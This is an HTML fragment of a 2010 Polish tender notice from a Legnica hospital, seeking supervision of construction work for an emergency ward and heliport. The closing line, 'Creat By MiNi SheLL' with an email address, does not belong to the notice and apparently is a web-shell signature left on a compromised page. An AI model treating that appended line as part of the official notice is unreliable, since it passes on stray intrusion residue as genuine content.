<ul class="kh_indent_1"><li><p>Ocena spełnienia n/w warunków dokonana zostanie zgodnie z formułą spełnia / nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt X.A SIWZ. Z treści dokumentów musi jednoznacznie wynikać, iż w/w  warunki Wykonawca spełnił.
Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, tj.:
- osobą, która pełnić będzie funkcję inspektora nadzoru robót budowlanych, posiadającą uprawnienia do kierowania robotami budowlanymi  w specjalności konstrukcyjno -budowlanej - bez ograniczeń
 - osobami, które będą pełnić funkcję inspektorów nadzoru, posiadającymi uprawnienia do kierowania robotami określonymi przepisami Prawa budowlanego w  specjalnościach:
-instalacyjnej w zakresie sieci , instalacji i urządzeń cieplnych,  wentylacyjnych,  wodociągowych  i kanalizacyjnych bez ograniczeń,
- instalacyjnej w zakresie sieci,  instalacji i urządzeń elektrycznych  i elektroenergetycznych bez ograniczeń,
- drogowej  
Zamawiający wymaga, aby przynajmniej jedna osoba po stronie Wykonawcy posiadała doświadczenie w pełnieniu funkcji Koordynatora Zespołu Inspektorów Nadzoru.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w zakresie osób imiennie wskazanych w jej treści, biorących udział w jej wykonaniu. Zmiana taka dopuszczalna jest w przypadkach szczególnych, niezależnych od stron umowy i nie może w jakikolwiek sposób negatywnie wpłynąć na jej wykonanie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.legnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Szpital Specjalistyczny w Legnicy, 59-220 Legnica, ul. Iwaszkiewicza 5 pok. 36 b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.07.2010 godzina 11:00, miejsce: Wojewódzki Szpital Specjalistyczny w Legnicy, 59-220 Legnica, ul. Iwaszkiewicza 5, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt w zakresie nadzoru inwestorskiego nad wykonaniem prac budowlanych, jak i prace budowlane określone w Zadaniu 2 są współfinansowane przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach działania 12.1 - Rozwój systemu ratownictwa medycznego priorytetu XII - Bezpieczeństwo zdrowotne i poprawa efektywności systemu ochrony zdrowia Programu Operacyjnego Infrastruktura i Środowisko 2007-2013 Projekt pn. Uruchomienie szpitalnego oddziału ratunkowego wraz z budową heliportu w Wojewódzkim Szpitalu Specjalistycznym w Legnicy.

Zamówienie będzie realizowane przez czas prac budowlanych wykonywanych w ramach Zadania 1, Zadania 2 i Zadania 3 - opisanych w punkcie III siwz, przy czym zaplanowany  czas trwania prac przyjęto na 15 miesięcy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com